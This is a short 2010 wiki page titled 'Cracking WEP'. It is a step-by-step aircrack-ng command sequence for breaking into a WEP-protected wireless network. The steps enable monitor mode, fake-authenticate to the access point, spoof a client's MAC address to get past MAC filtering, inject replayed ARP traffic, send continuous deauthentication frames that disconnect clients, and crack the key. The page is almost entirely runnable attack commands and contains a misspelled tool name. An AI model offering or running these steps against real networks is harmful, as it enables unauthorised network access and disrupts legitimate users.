Cracking WEP

From LinuxWindowsWiki

Jump to: navigation, search

List adapters: 

airmon-ng


Set the card in monitor mode: 

airmon-ng start wlan0


Find AP: 

airodump-ng mon0


Lock channel with AP: 

airodump-ng --channel 6 mon0


Leave it and open new terminal, and fake auth: 

aireplay-ng --fakeauth 0 -a 00:14:BF:11:22:33 -e testEssid mon0


If it fails, MAC filtering is on. Then try and use a MAC from one of the clients associated to the AP.


Macchanger: 

airmon-ng stop mon0
ifconfig wlan0 down
maccanger -m 00:11:22:33:44:55(MAC of the client) wlan0
ifconfig wlan0 up
airmon-ng start wlan0

Try fake auth again: 

aireplay-ng --fakeauth 0 -a 00:14:BF:11:22:33 -e testEssid mon0


Stop the airodump, and run with write: 

airodump-ng -c 6 -w ~/testEssid -i mon0


Launch aireplay-ng in injection mode : 

aireplay-ng -3 -b 00:14:BF:11:22:33 mon0


Leave it running, to speed up with deauth broadcast: 

aireplay-ng --deauth 0 -a 00:14:BF:11:22:33 mon0


Crack: 

aircrack-ng –0 -b 00:14:BF:11:22:33 ~/testEssid-01.ivs
Retrieved from "http://www.aaune.org/wiki/index.php?title=Cracking_WEP"
This page was last modified on 8 April 2010, at 14:28. This page has been accessed 4,101 times.